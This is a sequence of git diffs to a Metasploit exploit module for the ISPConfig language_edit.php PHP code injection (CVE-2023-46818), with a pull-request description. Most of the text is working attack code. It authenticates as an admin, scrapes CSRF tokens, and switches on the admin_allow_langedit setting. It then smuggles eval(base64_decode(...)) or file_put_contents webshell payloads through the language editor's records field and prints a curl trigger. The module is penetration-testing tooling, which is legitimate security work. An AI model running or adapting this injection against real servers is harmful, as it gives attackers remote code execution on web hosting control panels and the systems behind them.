@@ -162,10 +154,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     
-    if res && res.code == 200 && res.body.include?('language_edit')
+    if res&.code == 200 && res.body.include?('language_edit')
       print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
       return true
-    elsif res && res.code == 403
+    elsif res&.code == 403
       print_warning('Language editor access denied - admin_allow_langedit may be disabled')
       return false
     else
@@ -269,66 +261,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return payload_url
   end
 
-  def trigger_payload(payload_url)
-    print_status('Triggering PHP payload...')
-    # Small delay to ensure the file is written
-    sleep(1)
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => payload_url,
-      'keep_cookies' => true
-    })
-    if res&.code == 200
-      print_good('PHP payload triggered successfully')
-    else
-      print_warning('Payload trigger response was unexpected')
-    end
-  end
-
-  def cleanup
-    return unless @payload_file
-    print_status('Cleaning up payload file...')
-    # Use the same vulnerability to delete the file
-    injection = "'];unlink('#{@payload_file}');die;#"
-    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
-    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
-    initial_data = {
-      'lang' => 'en',
-      'module' => 'help',
-      'lang_file' => lang_file
-    }
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => edit_url,
-      'vars_post' => initial_data,
-      'keep_cookies' => true
-    })
-    return unless res
-    doc = res.get_html_document
-    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
-    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
-    return unless csrf_id && csrf_key
-    injection_data = {
-      'lang' => 'en',
-      'module' => 'help',
-      'lang_file' => lang_file,
-      '_csrf_id' => csrf_id,
-      '_csrf_key' => csrf_key,
-      'records[\\]' => injection
-    }
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => edit_url,
-      'vars_post' => injection_data,
-      'keep_cookies' => true
-    })
-    print_good("Payload file #{@payload_file} cleaned up")
-  end
-
   def exploit
-    unless @authenticated
-      authenticate
-      @authenticated = true
+    unless authenticate
+      fail_with(Failure::NoAccess, 'Login failed')
     end
     
     # Check if language editor permissions are enabled
@@ -349,7 +284,6 @@ class MetasploitModule < Msf::Exploit::Remote
     
     payload_url = inject_payload
     print_status('Starting payload handler...')
-    trigger_payload(payload_url)
     print_status('Manual trigger information:')
     print_line("URL: #{full_uri}#{payload_url}")
     print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -20,7 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'syfi' # Discovery and PoC
+          'syfi', # Discovery and PoC
+          'Egidio Romano'
         ],
         'References' => [
           ['CVE', '2023-46818'],
@@ -67,6 +68,39 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'login')
     })
     return CheckCode::Unknown unless res
+
+    # Try to log in and parse version if credentials are provided
+    if datastore['USERNAME'] && datastore['PASSWORD']
+      login_res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'login'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          's_mod' => 'login'
+        },
+        'keep_cookies' => true
+      })
+      if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
+        # Try to access the dashboard or settings page
+        settings_res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+          'keep_cookies' => true
+        })
+        if settings_res
+          doc = settings_res.get_html_document
+          # Try to find version in a span, div, or similar element
+          version_text = doc.text[/ISPConfig\s*v?(\d+\.\d+(?:\.\d+)?(?:p\d+)?)/i, 1]
+          if version_text
+            print_good("ISPConfig version detected: #{version_text}")
+            return CheckCode::Appears("Version: #{version_text}")
+          end
+        end
+      end
+    end
+
+    # Fallback to the previous check
     if res.body.include?('ISPConfig') && (res.body.include?('login') || res.body.include?('username') || res.body.include?('password'))
       print_good('ISPConfig installation detected')
       return CheckCode::Detected
@@ -87,10 +121,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     fail_with(Failure::NoAccess, 'Login request failed') unless res
+    if res&.code == 302
+      res = send_request_cgi({
+        'method' => 'GET',
+         'uri' => normalize_uri(target_uri.path, 'login/',res&.headers.fetch('Location',nil))
+      })
+    end
     if res.body.match(/Username or Password wrong/i)
       fail_with(Failure::NoAccess, 'Login failed: Invalid credentials')
     end
-    if res.headers['Location'] && res.headers['Location'].include?('admin') ||
+    if res.headers.fetch('Location',nil)&.include?('admin') ||
        res.body.downcase.include?('dashboard')
       print_good('Login successful!')
       return true
@@ -102,8 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def inject_payload
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
-    php_payload = payload.encoded
-    injection = "'];file_put_contents('#{@payload_file}','<?php #{php_payload} ?>');die;#"
+    injection = %<'];file_put_contents('#{@payload_file}',base64_decode('#{Base64.strict_encode64(payload.encoded)}');die;#"
     lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
@@ -118,13 +157,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     fail_with(Failure::UnexpectedReply, 'Unable to access language_edit.php') unless res
-    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
-    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
-    unless csrf_id_match && csrf_key_match
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    unless csrf_id && csrf_key
       fail_with(Failure::UnexpectedReply, 'CSRF tokens not found!')
     end
-    csrf_id = csrf_id_match[1]
-    csrf_key = csrf_key_match[1]
     print_good("Extracted CSRF tokens: ID=#{csrf_id[0..10]}..., KEY=#{csrf_key[0..10]}...")
     injection_data = {
       'lang' => 'en',
@@ -155,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => payload_url,
       'keep_cookies' => true
     })
-    if res && res.code == 200
+    if res&.code == 200
       print_good('PHP payload triggered successfully')
     else
       print_warning('Payload trigger response was unexpected')
@@ -181,11 +219,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     return unless res
-    csrf_id_match = res.body.match(/_csrf_id" value="([^"]+)"/)
-    csrf_key_match = res.body.match(/_csrf_key" value="([^"]+)"/)
-    return unless csrf_id_match && csrf_key_match
-    csrf_id = csrf_id_match[1]
-    csrf_key = csrf_key_match[1]
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    return unless csrf_id && csrf_key
     injection_data = {
       'lang' => 'en',
       'module' => 'help',

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -19,11 +19,11 @@ class MetasploitModule < Msf::Exploit::Remote
           language_edit.php file. The vulnerability occurs when the `admin_allow_langedit`
           setting is enabled, allowing authenticated administrators to inject arbitrary
           PHP code through the language editor interface.
-          
+
           This module will automatically check if the required `admin_allow_langedit`
           permission is enabled, and attempt to enable it if it's disabled (requires
           admin credentials with system configuration access).
-          
+
           The exploit works by injecting a PHP payload into a language file, which
           is then executed when the file is accessed. The payload is base64 encoded
           and written using PHP's file_put_contents function.
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
         }
       )
     )
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status('Checking if the target is ISPConfig...')
     return CheckCode::Unknown('Failed to login') unless authenticate
+
     # Always try to log in and parse version, since credentials are required
     # cookie_jar.clear (handled in exploit)
     # Try to access the dashboard or settings page
@@ -88,11 +89,11 @@ class MetasploitModule < Msf::Exploit::Remote
       version_element = doc.at('//p[@class="frmTextHead"]')
       if version_element
         version_text = version_element.text
-        version = version_text.split(":")[1].gsub(" ","")
+        version = version_text.split(':')[1].gsub(' ', '')
         version = Rex::Version.new(version)
         if version < Rex::Version.new('3.2.11p1')
           print_good("ISPConfig version detected: #{version_text}")
-          return CheckCode::Vulnerable("Version: #{version_text}")
+          return CheckCode::Appears("Version: #{version_text}")
         end
       end
     end
@@ -112,15 +113,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     })
     return false unless res
+
     if res&.code == 302
       res = send_request_cgi({
         'method' => 'GET',
-         'uri' => normalize_uri(target_uri.path, 'login/',res&.headers.fetch('Location',nil))
+        'uri' => normalize_uri(target_uri.path, 'login/', res&.headers&.fetch('Location', nil))
       })
     end
-    return false if res.body.match(/Username or Password wrong/i)
-    if res.headers.fetch('Location',nil)&.include?('admin') ||
-       res.body.downcase.include?('dashboard')
+    body_downcase = res.body.downcase.freeze
+    return false if body_downcase.include?('username or password wrong')
+
+    if res.headers.fetch('Location', nil)&.include?('admin') || body_downcase.include?('dashboard')
       print_good('Login successful!')
       return true
     end
@@ -130,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_langedit_permission
     print_status('Checking if admin_allow_langedit is enabled...')
-    
+
     # Try to access the language editor to see if it's accessible
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     res = send_request_cgi({
@@ -138,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => edit_url,
       'keep_cookies' => true
     })
-    
+
     if res&.code == 200 && res.body.include?('language_edit')
       print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
       return true
@@ -153,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def enable_langedit_permission
     print_status('Attempting to enable admin_allow_langedit...')
-    
+
     # Try to access the system settings page
     settings_url = normalize_uri(target_uri.path, 'admin', 'system_config.php')
     res = send_request_cgi({
@@ -161,21 +164,21 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => settings_url,
       'keep_cookies' => true
     })
-    
+
     unless res && res.code == 200
       print_warning('Could not access system configuration page')
       return false
     end
-    
+
     doc = res.get_html_document
     csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
     csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
-    
+
     unless csrf_id && csrf_key
       print_warning('Could not extract CSRF tokens from system config page')
       return false
     end
-    
+
     # Try to enable the setting
     enable_data = {
       '_csrf_id' => csrf_id,
@@ -183,14 +186,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'admin_allow_langedit' => '1',
       'action' => 'save'
     }
-    
+
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => settings_url,
       'vars_post' => enable_data,
       'keep_cookies' => true
     })
-    
+
     if res && res.code == 200
       print_good('Successfully enabled admin_allow_langedit')
       return true
@@ -205,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
     b64_payload = Base64.strict_encode64(payload.encoded)
     injection = "'];eval(base64_decode('#{b64_payload}'));die;#"
-    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
+    lang_file = Rex::Text.rand_text_alpha_lower(10) + '.lng'
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
       'lang' => 'en',
@@ -249,27 +252,27 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     cookie_jar.clear
     fail_with(Failure::NoAccess, 'Authentication failed') unless authenticate
-    
+
     # Check if language editor permissions are enabled
     unless check_langedit_permission
       print_warning('admin_allow_langedit appears to be disabled')
       print_status('Attempting to enable admin_allow_langedit...')
-      
+
       if enable_langedit_permission
         print_good('Successfully enabled admin_allow_langedit, retrying exploit...')
         # Re-check permissions after enabling
         unless check_langedit_permission
-          fail_with(Failure::UnexpectedReply, 'Failed to enable admin_allow_langedit or language editor still not accessible')
+          fail_with(Failure::NoAccess, 'Failed to enable admin_allow_langedit or language editor still not accessible')
         end
       else
         fail_with(Failure::UnexpectedReply, 'Could not enable admin_allow_langedit - exploit requires this setting to be enabled')
       end
     end
-    
+
     payload_url = inject_payload
     print_status('Starting payload handler...')
     print_status('Manual trigger information:')
     print_line("URL: #{full_uri}#{payload_url}")
     print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
   end
-end 
+end

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -74,38 +74,25 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status('Checking if the target is ISPConfig...')
     # Always try to log in and parse version, since credentials are required
-    # Clear any existing cookies before login
-    cookie_jar.clear
-    
-    login_res = send_request_cgi!({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login/'),
-      'vars_post' => {
-        'username' => datastore['USERNAME'],
-        'password' => datastore['PASSWORD'],
-        's_mod' => 'login'
-      },
+    # cookie_jar.clear (handled in exploit)
+    return CheckCode::Safe unless authenticate
+    # Try to access the dashboard or settings page
+    settings_res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
       'keep_cookies' => true
     })
-    if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
-      # Try to access the dashboard or settings page
-      settings_res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
-        'keep_cookies' => true
-      })
-      if settings_res
-        doc = settings_res.get_html_document
-        # Try to find version in a span, div, or similar element
-        version_element = doc.at('//p[@class="frmTextHead"]')
-        if version_element
-          version_text = version_element.text
-          version = version_text.split(":")[1].gsub(" ","")
-          version = Rex::Version.new(version)
-          if version < Rex::Version.new('3.2.11p1')
-            print_good("ISPConfig version detected: #{version_text}")
-            return CheckCode::Vulnerable("Version: #{version_text}")
-          end
+    if settings_res
+      doc = settings_res.get_html_document
+      # Try to find version in a span, div, or similar element
+      version_element = doc.at('//p[@class="frmTextHead"]')
+      if version_element
+        version_text = version_element.text
+        version = version_text.split(":")[1].gsub(" ","")
+        version = Rex::Version.new(version)
+        if version < Rex::Version.new('3.2.11p1')
+          print_good("ISPConfig version detected: #{version_text}")
+          return CheckCode::Vulnerable("Version: #{version_text}")
         end
       end
     end
@@ -116,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting login with username '#{datastore['USERNAME']}' and password '#{datastore['PASSWORD']}'")
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'login'),
+      'uri' => normalize_uri(target_uri.path, 'login/'),
       'vars_post' => {
         'username' => datastore['USERNAME'],
         'password' => datastore['PASSWORD'],
@@ -262,6 +249,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    cookie_jar.clear
     unless authenticate
       fail_with(Failure::NoAccess, 'Login failed')
     end

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -142,7 +142,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def inject_payload
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
-    injection = %<'];file_put_contents('#{@payload_file}',base64_decode('#{Base64.strict_encode64(payload.encoded)}');die;#"
+    b64_payload = Base64.strict_encode64(payload.encoded)
+    injection = "'];file_put_contents('#{@payload_file}',base64_decode('#{b64_payload}'));die;#"
     lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
@@ -170,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'lang_file' => lang_file,
       '_csrf_id' => csrf_id,
       '_csrf_key' => csrf_key,
-      'records[\\]' => injection
+      'records[\]' => injection
     }
     res = send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -16,7 +16,18 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'ISPConfig language_edit.php PHP Code Injection',
         'Description' => %q{
-          An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
+          This module exploits a PHP code injection vulnerability in ISPConfig's
+          language_edit.php file. The vulnerability occurs when the `admin_allow_langedit`
+          setting is enabled, allowing authenticated administrators to inject arbitrary
+          PHP code through the language editor interface.
+          
+          This module will automatically check if the required `admin_allow_langedit`
+          permission is enabled, and attempt to enable it if it's disabled (requires
+          admin credentials with system configuration access).
+          
+          The exploit works by injecting a PHP payload into a language file, which
+          is then executed when the file is accessed. The payload is base64 encoded
+          and written using PHP's file_put_contents function.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -139,6 +150,78 @@ class MetasploitModule < Msf::Exploit::Remote
     true
   end
 
+  def check_langedit_permission
+    print_status('Checking if admin_allow_langedit is enabled...')
+    
+    # Try to access the language editor to see if it's accessible
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => edit_url,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200 && res.body.include?('language_edit')
+      print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
+      return true
+    elsif res && res.code == 403
+      print_warning('Language editor access denied - admin_allow_langedit may be disabled')
+      return false
+    else
+      print_warning('Could not determine language editor accessibility')
+      return false
+    end
+  end
+
+  def enable_langedit_permission
+    print_status('Attempting to enable admin_allow_langedit...')
+    
+    # Try to access the system settings page
+    settings_url = normalize_uri(target_uri.path, 'admin', 'system_config.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => settings_url,
+      'keep_cookies' => true
+    })
+    
+    unless res && res.code == 200
+      print_warning('Could not access system configuration page')
+      return false
+    end
+    
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    
+    unless csrf_id && csrf_key
+      print_warning('Could not extract CSRF tokens from system config page')
+      return false
+    end
+    
+    # Try to enable the setting
+    enable_data = {
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'admin_allow_langedit' => '1',
+      'action' => 'save'
+    }
+    
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => settings_url,
+      'vars_post' => enable_data,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200
+      print_good('Successfully enabled admin_allow_langedit')
+      return true
+    else
+      print_warning('Failed to enable admin_allow_langedit')
+      return false
+    end
+  end
+
   def inject_payload
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
@@ -243,6 +326,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     authenticate
+    
+    # Check if language editor permissions are enabled
+    unless check_langedit_permission
+      print_warning('admin_allow_langedit appears to be disabled')
+      print_status('Attempting to enable admin_allow_langedit...')
+      
+      if enable_langedit_permission
+        print_good('Successfully enabled admin_allow_langedit, retrying exploit...')
+        # Re-check permissions after enabling
+        unless check_langedit_permission
+          fail_with(Failure::UnexpectedReply, 'Failed to enable admin_allow_langedit or language editor still not accessible')
+        end
+      else
+        fail_with(Failure::UnexpectedReply, 'Could not enable admin_allow_langedit - exploit requires this setting to be enabled')
+      end
+    end
+    
     payload_url = inject_payload
     print_status('Starting payload handler...')
     trigger_payload(payload_url)

--- a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
+++ b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -70,21 +70,21 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
       OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
     ])
+    
+    @authenticated = false
   end
 
   def check
     print_status('Checking if the target is ISPConfig...')
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login')
-    })
-    return CheckCode::Unknown unless res
-
+    
     # Try to log in and parse version if credentials are provided
     if datastore['USERNAME'] && datastore['PASSWORD']
-      login_res = send_request_cgi({
+      # Clear any existing cookies before login
+      cookie_jar.clear
+      
+      login_res = send_request_cgi!({
         'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'login'),
+        'uri' => normalize_uri(target_uri.path, 'login/'),
         'vars_post' => {
           'username' => datastore['USERNAME'],
           'password' => datastore['PASSWORD'],
@@ -96,26 +96,27 @@ class MetasploitModule < Msf::Exploit::Remote
         # Try to access the dashboard or settings page
         settings_res = send_request_cgi({
           'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),
+          'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
           'keep_cookies' => true
         })
         if settings_res
           doc = settings_res.get_html_document
           # Try to find version in a span, div, or similar element
-          version_text = doc.text[/ISPConfig\s*v?(\d+\.\d+(?:\.\d+)?(?:p\d+)?)/i, 1]
-          if version_text
-            print_good("ISPConfig version detected: #{version_text}")
-            return CheckCode::Appears("Version: #{version_text}")
+          version_element = doc.at('//p[@class="frmTextHead"]')
+          if version_element
+            version_text = version_element.text
+            version = version_text.split(":")[1].gsub(" ","")
+            version = Rex::Version.new(version)
+            if version < Rex::Version.new('3.2.11p1')
+              print_good("ISPConfig version detected: #{version_text}")
+              @authenticated = true
+              return CheckCode::Vulnerable("Version: #{version_text}")
+            end
           end
         end
       end
     end
 
-    # Fallback to the previous check
-    if res.body.include?('ISPConfig') && (res.body.include?('login') || res.body.include?('username') || res.body.include?('password'))
-      print_good('ISPConfig installation detected')
-      return CheckCode::Detected
-    end
     CheckCode::Safe
   end
 
@@ -226,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
     b64_payload = Base64.strict_encode64(payload.encoded)
-    injection = "'];file_put_contents('#{@payload_file}',base64_decode('#{b64_payload}'));die;#"
+    injection = "'];eval(base64_decode('#{b64_payload}'));die;#"
     lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
     edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
     initial_data = {
@@ -325,7 +326,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    authenticate
+    unless @authenticated
+      authenticate
+      @authenticated = true
+    end
     
     # Check if language editor permissions are enabled
     unless check_langedit_permission


### PR DESCRIPTION
## Summary

This PR adds a new Metasploit exploit module for ISPConfig language_edit.php PHP Code Injection (CVE-2023-46818).

- Module path: modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
- Documentation: documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md

## Vulnerability Details

An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if `admin_allow_langedit` is enabled, leading to remote code execution as the web server user.

## References

- CVE-2023-46818
- PoC and advisories: [https://github.com/SyFi/CVE-2023-46818](https://github.com/SyFi/CVE-2023-46818)
- [https://karmainsecurity.com/KIS-2023-13](https://karmainsecurity.com/KIS-2023-13)

## Module Features

- Authenticates as an ISPConfig admin user
- Exploits the language_edit.php endpoint to drop a PHP webshell
- Triggers a Meterpreter or command shell payload
- Cleans up the webshell after exploitation (optional)
- Includes full documentation and usage example

## Testing

Tested against a local ISPConfig 3.2.11 instance with `admin_allow_langedit` enabled, following the PoC steps from the referenced GitHub repository.

---

Thanks to [SyFi](https://github.com/SyFi/CVE-2023-46818) for the original PoC and vulnerability research.